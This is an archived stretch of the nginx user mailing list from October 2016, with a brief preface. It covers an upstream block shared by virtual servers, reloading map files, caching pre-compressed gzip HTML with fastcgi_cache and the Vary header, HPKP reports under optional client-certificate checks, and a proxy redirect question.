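For reference, the shape of the configuration being discussed: one upstream{} block shared by two virtual servers. The round-robin state belongs to the upstream block, not to the server{} blocks, which is why the overall load evens out. Names and addresses here are hypothetical:

    upstream backend {
        server 192.0.2.10:8080;
        server 192.0.2.11:8080;
    }

    server {
        server_name vhost1.example.com;
        location / { proxy_pass http://backend; }
    }

    server {
        server_name vhost2.example.com;
        location / { proxy_pass http://backend; }
    }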
From alex at samad.com.au Sat Oct 29 02:42:32 2016 From: alex at samad.com.au (Alex Samad) Date: Sat, 29 Oct 2016 13:42:32 +1100 Subject: nginx and FIX server In-Reply-To: References: Message-ID:

Hi

Not really an option in the current setup. The rate limit is to stop clients with bad FIX servers that spam our FIX server.

Right now we have a custom bit of Java code that rate limits TCP streams. We just bought into nginx, so I'm looking at stream proxying it through nginx instead.

A

On 29 October 2016 at 02:48, CJ Ess wrote:
> Cool. Probably off topic, but why rate limit FIX? My solution for heavy
> traders was always to put them on their own hardware and pass the costs back
> to them. They are usually invested in whatever strategy they are using and
> happy to pay up.
> [..]

From reallfqq-nginx at yahoo.fr Sat Oct 29 22:04:38 2016 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Sun, 30 Oct 2016 00:04:38 +0200 Subject: Dynamically Reload Map In-Reply-To: <74A4D440E25E6843BC8E324E67BB3E394558128B@N060XBOXP38.kroger.com> References: <74A4D440E25E6843BC8E324E67BB3E394558128B@N060XBOXP38.kroger.com> Message-ID:

nginx parses configuration as a whole, either on start or on a HUP signal. Your map is part of the configuration (separating it into multiple files does not change the fact that everything is merged before being statically interpreted/compiled), thus you need to signal the master process whenever you change it.

nginx gracefully finishes processing current requests on old workers while spawning new ones and accepting new connections there. If performance is an issue, I suggest you have a serious look at how you dimensioned your infrastructure, since at most double the number of workers could be using resources at the same time. If that is not acceptable, you will have to resort to killing old workers manually.

---
*B. R.*

On Thu, Oct 27, 2016 at 9:44 PM, Cox, Eric S wrote:
> Is anyone aware of a way to dynamically reload a file when using the MAP
> module without having to reload the server? We have a file that gets
> updated roughly every minute that needs to be reloaded, and it seems that
> doing a reload every minute on the server processes might cause a
> performance issue.
>
> Also, is anyone aware of a way to view the current size of the map hash
> tables?
>
> Thanks
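A sketch of the pattern B.R. describes, assuming the frequently updated file is pulled into the map block with include (the variable names and path are hypothetical):

    map $cookie_user $user_group {
        default "none";
        include /etc/nginx/user_groups.map;   # the file regenerated every minute
    }

    # After rewriting the included file, the whole configuration still has
    # to be re-read; "nginx -s reload" sends the HUP signal B.R. mentions.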
From reallfqq-nginx at yahoo.fr Sat Oct 29 22:17:20 2016 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Sun, 30 Oct 2016 00:17:20 +0200 Subject: Pre-compressed (gzip) HTML using fastcgi_cache? In-Reply-To: <4521b802d545803df2ad2333acd6c95a.NginxMailingListEnglish@forum.nginx.org> References: <4521b802d545803df2ad2333acd6c95a.NginxMailingListEnglish@forum.nginx.org> Message-ID:

$http_accept_encoding gets the value of the HTTP Accept-Encoding header. This might vary depending on the client being used, unless you control the clients and their values. Thus, the same request being made with a different (set of) value(s) in this header will generate another key.

If you simply want to check that a specific value is being used in this header, you might filter its content through a (series of) map and use the filtered values only as part of a cache key.

That is a quick idea; I have not put much thought into it, but it could be a step in the direction you want to go.

---
*B. R.*

On Thu, Oct 27, 2016 at 8:41 PM, seo010 wrote:
> Hi!
>
> I was wondering if anyone has an idea to serve pre-compressed (gzip) HTML
> using proxy_cache / fastcgi_cache.
>
> I tried a solution with a map of http_accept_encoding as part of the
> fastcgi_cache_key, with gzip-compressed output from the script, but it
> resulted in strange behavior (the MD5 hash for the first request
> corresponds to the KEY; the next requests use an unknown MD5 hash for the
> same KEY).
>
> Nginx version: 1.11.1
> [..]
>
> Best Regards,
> Jan Jaap
>
> Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270604,270604#msg-270604
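In configuration form, B.R.'s filtering idea looks like seo010's existing map, with the filtered value used as the only client-dependent part of the key (the variable name is illustrative):

    map $http_accept_encoding $encoding_key {
        default "";
        ~*gzip  gzip;
    }

    fastcgi_cache_key "$encoding_key$request_method$request_uri";

This collapses every possible Accept-Encoding value into two normalized forms, so each URI gets at most two cache entries.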
From nginx-forum at forum.nginx.org Sun Oct 30 09:24:27 2016 From: nginx-forum at forum.nginx.org (seo010) Date: Sun, 30 Oct 2016 05:24:27 -0400 Subject: Pre-compressed (gzip) HTML using fastcgi_cache? In-Reply-To: References: Message-ID:

Hi *B. R.*!

Thanks a lot for the reply and information! The KEY, however, does not contain different data from http_accept_encoding. When viewing the contents of the cache file, it contains the exact same KEY for both MD5 hashes. Also, it does not matter what browser is used for the first request. For example, using a Google PageSpeed test for the first request will create the expected MD5 hash for the KEY, and a next request using Chrome will create a new hash for a file that contains the line "KEY: ..." that matches the KEY of the first MD5 hash.

The third request also has a different KEY. I did not test any further; it may be that the KEY will change for every new client. The KEY does remain the same, however, for the same client. For example, the first request uses the MD5 hash as expected for the KEY (as generated by MD5) and it will keep using it in next requests.

As gzip compression causes a huge overhead on servers with high traffic, I was wondering if Nginx would cache the gzip-compressed result and if so, if there is a setting with a maximum cache size. It would, however, cause a waste of cache space.

In tests the overhead added 4 to 10 ms on a powerful server for every request compared with loading pre-compressed gzip HTML directly. It makes me wonder what the effect will be on servers with high traffic.

As there appears to be no solution in Google, finding an answer may be helpful for a lot of websites and it will make Nginx the best option for full page cache.

Best Regards,
Jan Jaap

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270604,270647#msg-270647
From lucas at lucasrolff.com Sun Oct 30 09:49:35 2016 From: lucas at lucasrolff.com (Lucas Rolff) Date: Sun, 30 Oct 2016 10:49:35 +0100 Subject: Pre-compressed (gzip) HTML using fastcgi_cache? In-Reply-To: References: Message-ID: <5815C22F.7050304@lucasrolff.com>

What you could do (I basically asked the same question a week ago) is enforce "Accept-Encoding: gzip" whenever you fastcgi_pass, meaning you'll always request gzipped content from your backend. Then you can enable on-the-fly decompression by using "gunzip on;".

This means that for a client that does not support gzip compression, nginx will uncompress the file on the fly, while the rest of the requests are served the file directly with "Content-Encoding: gzip", and supporting clients will automatically do whatever they should.

First of all it saves you a bunch of storage, and it should give you the result you want: serving (pre)compressed files to clients that support it.

-- Best Regards, Lucas Rolff

seo010 wrote:
> Hi *B. R.*!
>
> Thanks a lot for the reply and information! The KEY, however, does not
> contain different data from http_accept_encoding. [..]
>
> As gzip compression causes a huge overhead on servers with high traffic, I
> was wondering if Nginx would cache the gzip-compressed result and if so, if
> there is a setting with a maximum cache size. It would, however, cause a
> waste of cache space.
> [..]
>
> Best Regards,
> Jan Jaap
>
> Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270604,270647#msg-270647
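A sketch of what Lucas describes; forcing the Accept-Encoding FastCGI parameter assumes the backend honours it, and "gunzip on;" requires nginx built with --with-http_gunzip_module (the paths reuse the earlier example):

    location ~ \.php$ {
        # Always request gzip from the backend, whatever the client sent:
        fastcgi_param HTTP_ACCEPT_ENCODING "gzip";
        fastcgi_pass unix:/path/to/php-fpm.sock;
        # ... cache directives as before ...
    }

    # Decompress on the fly only for clients that did not ask for gzip:
    gunzip on;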
> > Best Regards, > Jan Jaap > > Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270604,270647#msg-270647 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From nginx-forum at forum.nginx.org Sun Oct 30 17:03:56 2016 From: nginx-forum at forum.nginx.org (seo010) Date: Sun, 30 Oct 2016 13:03:56 -0400 Subject: Pre-compressed (gzip) HTML using fastcgi_cache? In-Reply-To: <5815C22F.7050304@lucasrolff.com> References: <5815C22F.7050304@lucasrolff.com> Message-ID: Hi! It sounds like a good solution to improve the performance, however, I just read the following post by Jake Archibald (Google Chrome developer). "Yeah, ~10% of BBC visitors don?t support gzip compression. It was higher during the day (15-20%) but lower in the evenings and weekends (<10%). Pretty much puts the blame in the direction of corporate proxies." https://www.stevesouders.com/blog/2009/11/11/whos-not-getting-gzip/ It appears that an amount of traffic would require gzip. For high traffic websites it may not be a sufficient solution to guarantee optimal performance. It is not a nice idea to have an aspect of an implemented solution of which the stability and performance cannot be depended on. Imagine a high traffic website that receives a spike in traffic after a TV commercial. If just 5% of traffic would not support gzip, it may cause a load that would reduce the overall performance of the website, potentially causing a loss in revenue and user experience. Load tests may not have been able to show the performance bottleneck, as they may not factor in gzip support and it may not be possible to predict what amount of clients support gzip. If a global website receives a traffic spike, it may be that for a specific geographic area a larger percentage of users does not support gzip, causing the server performance to fail. Best Regards, Jan Jaap Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270604,270649#msg-270649 From lucas at lucasrolff.com Sun Oct 30 17:51:44 2016 From: lucas at lucasrolff.com (Lucas Rolff) Date: Sun, 30 Oct 2016 18:51:44 +0100 Subject: Pre-compressed (gzip) HTML using fastcgi_cache? In-Reply-To: References: <5815C22F.7050304@lucasrolff.com> Message-ID: <58163330.50306@lucasrolff.com> Well - then put fastcgi_ignore_headers Vary, make your map determine if the client support gzip or not, then you'll have 2 entries of everything, 1 gzipped and one not gzipped. I'm not sure how much traffic we're talking about when it's about 'high traffic' - you'd probably want to run your proxy separately anyway, and then you can basically just scale out during peaks anyway. -- Best Regards, Lucas Rolff seo010 wrote: > Hi! > > It sounds like a good solution to improve the performance, however, I just > read the following post by Jake Archibald (Google Chrome developer). > > "Yeah, ~10% of BBC visitors don?t support gzip compression. It was higher > during the day (15-20%) but lower in the evenings and weekends (<10%). > Pretty much puts the blame in the direction of corporate proxies." > > https://www.stevesouders.com/blog/2009/11/11/whos-not-getting-gzip/ > > It appears that an amount of traffic would require gzip. For high traffic > websites it may not be a sufficient solution to guarantee optimal > performance. It is not a nice idea to have an aspect of an implemented > solution of which the stability and performance cannot be depended on. 
>
> Best Regards,
> Jan Jaap
>
> Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270604,270649#msg-270649

From lists at localguru.de Sun Oct 30 20:34:26 2016 From: lists at localguru.de (Marcus Schopen) Date: Sun, 30 Oct 2016 21:34:26 +0100 Subject: HPKP report-uri and nginx ssl_verify_client Message-ID: <1477859666.16598.6.camel@cosmo.binux.de>

Hi,

on the host I'd like to send HPKP reports to, ssl_verify_client is set to "optional":

    ssl_client_certificate /etc/nginx/ssl/CA.pem;
    ssl_verify_client optional;

If an HPKP policy fails (for another domain), Chrome (54.0.2840.71 (64-bit)) sends HPKP reports to that reporting host, but the POST ends with an "ERR_SSL_CLIENT_AUTH_CERT_NEEDED" error, which in my understanding is not correct, because the /hpkp-report path doesn't require a client certificate for authentication. Chrome bug?

chrome://net-internals/#events
-----------------
322: URL_REQUEST
https://www.example.org/hpkp-report
Start Time: 2016-10-30 16:56:20.278

t=4559 [st= 0] +REQUEST_ALIVE [dt=75]
t=4559 [st= 0]  URL_REQUEST_DELEGATE [dt=0]
t=4559 [st= 0] +URL_REQUEST_START_JOB [dt=75]
                --> load_flags = 1618 (BYPASS_CACHE | DISABLE_CACHE | DO_NOT_SAVE_COOKIES | DO_NOT_SEND_AUTH_DATA | DO_NOT_SEND_COOKIES)
                --> method = "POST"
                --> priority = "LOWEST"
                --> upload_id = "0"
                --> url = "https://www.example.org/hpkp-report"
t=4559 [st= 0]  URL_REQUEST_DELEGATE [dt=0]
t=4559 [st= 0]  HTTP_CACHE_GET_BACKEND [dt=0]
t=4559 [st= 0] +HTTP_STREAM_REQUEST [dt=75]
t=4559 [st= 0]  HTTP_STREAM_REQUEST_STARTED_JOB
                --> source_dependency = 323 (HTTP_STREAM_JOB)
t=4634 [st=75]  HTTP_STREAM_REQUEST_BOUND_TO_JOB
                --> source_dependency = 323 (HTTP_STREAM_JOB)
t=4634 [st=75] -HTTP_STREAM_REQUEST
t=4634 [st=75]  URL_REQUEST_DELEGATE [dt=0]
t=4634 [st=75]  CANCELLED
                --> net_error = -110 (ERR_SSL_CLIENT_AUTH_CERT_NEEDED)
t=4634 [st=75] -URL_REQUEST_START_JOB
                --> net_error = -110 (ERR_SSL_CLIENT_AUTH_CERT_NEEDED)
t=4634 [st=75]  URL_REQUEST_DELEGATE [dt=0]
t=4634 [st=75] -REQUEST_ALIVE
-----------------

If I type https://www.example.org/hpkp-report into Chrome's address bar I don't get an SSL error (tested with different clients).

Ciao
Marcus

-- I think we dream so we don't have to be apart so long. If we're in each other's dreams, we can play together all night. -- Calvin

From nginx-forum at forum.nginx.org Mon Oct 31 13:11:59 2016 From: nginx-forum at forum.nginx.org (tbaror) Date: Mon, 31 Oct 2016 09:11:59 -0400 Subject: Help how to Proxy without redirect Message-ID: <5d0a66b7df9fb7ed640b210bc04073fc.NginxMailingListEnglish@forum.nginx.org>

Hello All,

I need to use Nginx as a proxy and pass all communication through it without redirecting to the original web location. I have the following configuration file. The initial logon and welcome page work well, but as soon as I click on a link it gets redirected to the original web page. Any idea how to keep it on the proxy?

Thanks
    server {
        listen 80;
        return 301 https://$host$request_uri;
    }

    server {
        listen 443;
        server_name gfn-docker.daet.local;

        ssl_certificate /etc/nginx/cert.crt;
        ssl_certificate_key /etc/nginx/cert.key;
        ssl on;
        ssl_session_cache shared:SSL:30m;
        ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
        ssl_ciphers HIGH:!aNULL:!eNULL:!EXPORT:!CAMELLIA:!DES:!MD5:!PSK:!RC4;
        ssl_prefer_server_ciphers on;

        access_log /var/log/nginx/jenkins.access.log;

        location / {
            auth_basic "Restricted Content";
            auth_basic_user_file /etc/nginx/.htpasswd;
            proxy_pass http://192.168.1.60:38080;
            proxy_redirect off;
            proxy_set_header Host $host;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        }
    }

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270653,270653#msg-270653

From nginx-forum at forum.nginx.org Mon Oct 31 19:08:48 2016 From: nginx-forum at forum.nginx.org (seo010) Date: Mon, 31 Oct 2016 15:08:48 -0400 Subject: Pre-compressed (gzip) HTML using fastcgi_cache? In-Reply-To: <58163330.50306@lucasrolff.com> References: <58163330.50306@lucasrolff.com> Message-ID: <223fed1b40731311a813b91ea8d07053.NginxMailingListEnglish@forum.nginx.org>

Hi Lucas,

Thanks a lot for the suggestion. We were already using that solution, but a strange behavior occurred (see the opening post). The first request uses the expected MD5 hash of the KEY, and that client will keep using that hash (the MISS/HIT header is accurate). However, requests from other clients make Nginx use a different (unknown) MD5 hash for the exact same content and KEY. The cache file contains a row with "KEY: ..." that matches the expected KEY, and the same KEY appears in the files for the other MD5 hashes.

Do you have an idea what may cause this behavior?

Best Regards,
Jan Jaap

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270604,270661#msg-270661

From lucas at lucasrolff.com Mon Oct 31 19:45:23 2016 From: lucas at lucasrolff.com (Lucas Rolff) Date: Mon, 31 Oct 2016 20:45:23 +0100 Subject: Pre-compressed (gzip) HTML using fastcgi_cache? In-Reply-To: <223fed1b40731311a813b91ea8d07053.NginxMailingListEnglish@forum.nginx.org> References: <58163330.50306@lucasrolff.com> <223fed1b40731311a813b91ea8d07053.NginxMailingListEnglish@forum.nginx.org> Message-ID: <58179F53.2090207@lucasrolff.com>

Hello,

It's not strange behavior, it's expected. What happens is that even though the key is the same, the actual returned content *might* be different. As an example: if your origin returns "Vary: Accept-Encoding", Nginx will cache based on this, so if the Accept-Encoding differs, the md5 (the path) will be different.

So if your cache_key is $host$request_uri and I request http://domain.com/text.html using a standard curl, my Accept-Encoding won't be there, and the file will be cached under hash XXXXXXXXXXXXXXXXXXXXX. Whenever a Google Chrome user comes along and does the exact same request to http://domain.com/text.html, the cache_key will still be the same, but since Chrome sends gzip, deflate (and some others), nginx will still cache it differently, thus resulting in different md5's on the filesystem.

If you use fastcgi_ignore_headers Vary; (I don't see this in the initial post), it shouldn't generate multiple md5's for the same key. Basically nginx's cache wants to work as it should and actually obey the Vary header; if you don't want to obey it, you should ignore it. And use something else (like the gzip_enabled variable) within your cache key to still generate 2 different files.

-- Best Regards, Lucas Rolff

seo010 wrote:
> Hi Lucas,
>
> Thanks a lot for the suggestion. We were already using that solution, but a
> strange behavior occurred (see the opening post). [..]
>
> Best Regards,
> Jan Jaap
>
> Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270604,270661#msg-270661
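Putting Lucas's two points together with the map from the opening post, the cache section would contain roughly this ("Vary" can be added to the ignore list since nginx 1.7.7):

    map $http_accept_encoding $gzip_enabled {
        ~*gzip gzip;
    }

    # Stop the Vary header from creating extra cache hashes; the key below
    # still keeps one gzipped and one plain entry per URI:
    fastcgi_ignore_headers Cache-Control Expires Set-Cookie Vary;
    fastcgi_cache_key "$gzip_enabled$request_method$request_uri";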
From nginx-forum at forum.nginx.org Mon Oct 31 19:56:10 2016 From: nginx-forum at forum.nginx.org (seo010) Date: Mon, 31 Oct 2016 15:56:10 -0400 Subject: Pre-compressed (gzip) HTML using fastcgi_cache? In-Reply-To: <58179F53.2090207@lucasrolff.com> References: <58179F53.2090207@lucasrolff.com> Message-ID:

Hi Lucas,

Thanks a lot for the information! Hopefully it will help many others who find this topic via Google, as there was almost no information about it available.

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270604,270665#msg-270665

From nginx-forum at forum.nginx.org Mon Oct 31 19:59:11 2016 From: nginx-forum at forum.nginx.org (seo010) Date: Mon, 31 Oct 2016 15:59:11 -0400 Subject: Pre-compressed (gzip) HTML using fastcgi_cache? In-Reply-To: References: <58179F53.2090207@lucasrolff.com> Message-ID: <15ab117bd2f1cc01cca4e140d6dfd730.NginxMailingListEnglish@forum.nginx.org>

Just for the record: this topic contains 2 suggested solutions:

1) storing gzip-compressed and uncompressed HTML separately and having Nginx determine gzip support instead of the client
2) storing gzip permanently and using the Nginx gunzip module to gunzip HTML for browsers without gzip support

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270604,270666#msg-270666